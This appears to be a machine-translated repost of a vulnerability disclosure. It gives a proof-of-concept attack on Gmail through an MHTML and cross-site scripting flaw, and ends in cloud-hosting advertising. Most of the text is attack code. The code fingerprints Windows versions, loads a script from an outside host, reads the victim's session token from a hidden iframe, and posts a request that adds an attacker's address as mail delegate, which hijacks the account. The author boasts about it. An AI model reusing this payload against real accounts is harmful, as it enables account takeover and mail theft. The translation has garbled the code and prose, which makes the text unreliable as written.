Brief description:
For more information, see the following section.
Detailed description:
I have already completed this... now I want to share with you the complete POC!
Proof of vulnerability:
<Script language = "javascript">
Function detectOS (){
Var sUserAgent = navigator. userAgent;
Var isWin = (navigator. platform = "Win32") | (navigator. platform = "Windows ");
If (isWin ){
Var isWin2K = sUserAgent. indexOf ("Windows NT 5.0")>-1 | sUserAgent. indexOf ("Windows 2000")>-1;
Var isWinXP = sUserAgent. indexOf ("Windows NT 5.1")>-1 | sUserAgent. indexOf ("Windows XP")>-1;
Var isWin2003 = sUserAgent. indexOf ("Windows NT 5.2")>-1 | sUserAgent. indexOf ("Windows 2003")>-1;
If (isWin2K | isWinXP | isWin2003) document. location = "mhtml: https://mail.google.com/support/bin/answer.py? Answer = 6576 & cbid =-1vw2scem46j8f & src = cb & lev= index & answer = % 250AContent-Location: viki % 250aContent-Transfer-Encoding: base64 % Signature =! Viki ";
Var isWinVista = sUserAgent. indexOf ("Windows NT 6.0")>-1 | sUserAgent. indexOf ("Windows Vista")>-1;
Var isWin7 = sUserAgent. indexOf ("Windows NT 6.1")>-1 | sUserAgent. indexOf ("Windows 7")>-1;
If (isWin7 | isWinVista) document. location = "mhtml: https://mail.google.com/support/bin/answer.py? Answer = 6576 & cbid =-1vw2scem46j8f & src = cb & lev= index & answer = % 0AContent-Location: viki % 0aContent-Transfer-Encoding: Signature =! Viki ";
}
Return "other ";
}
DetectOS ();
</Script>
Content-Transfer-Encoding: base64-encoded. Call a js.
<Script src = http://www.bkjia.com/jack.js> </script>
The JS Code is as follows:
Document. write (<iframe id = ifr width = 0 height = 0 onload = "crosscookie ()" src ="Http://mail.google.com/mail/x/ & gt; </iframe & gt;
Function crosscookie (){
Var KEY = GMAIL_AT;
Var MAIL = jacks@gmail.com
Ifr = ifr. contentWindow? Ifr. contentWindow: ifr. contentDocument;
Var cookies = ifr.doc ument. cookie. split (/s *; s */);
Var GMAIL_AT;
Var IK;
For (var I = 0, len = cookies. length; I <len; I ++ ){
Var arr = cookies [I]. split (/s * = s */);
If (arr [0] = KEY ){
GMAIL_AT = arr [1];
}
}
Var xhr = new ifr. ActiveXObject (Microsoft. XMLHttp );
Xhr. open (GET, https://mail.google.com/mail/, false );
Xhr. send ();
Var source = xhr. responseText;
Var reg =/GLOBALS = [/;
Var result = reg.exe c (source );
Var pos = result. index + (result +). length;
Var len = source. length;
Var l = 1;
Var start = pos;
While (pos <len ){
Var c = source. charAt (pos );
If (c = [){
L ++;
} Else if (c =]) {
L --;
}
If (l = 0) break;
Pos ++;
}
IK = eval ([+ source. substring (start, pos) +]) [9];
Xhr. open (POST, https://mail.google.com/mail? Ui = 2 & ik = + IK + & view = mdlg & at = + GMAIL_AT, false );
Xhr. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded ")
Xhr. send (mdrp = 1 & mda = + MAIL );
Document. location = "http://www.bkjia.com/images/scan.jpg ";
// Window. close ();
}
I don't have to say much about what I can do?
Solution:
The official website has already been fixed. Release it. Study mail xss! Some departments still like this kind of things very much!
Or mhtml problems ~
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
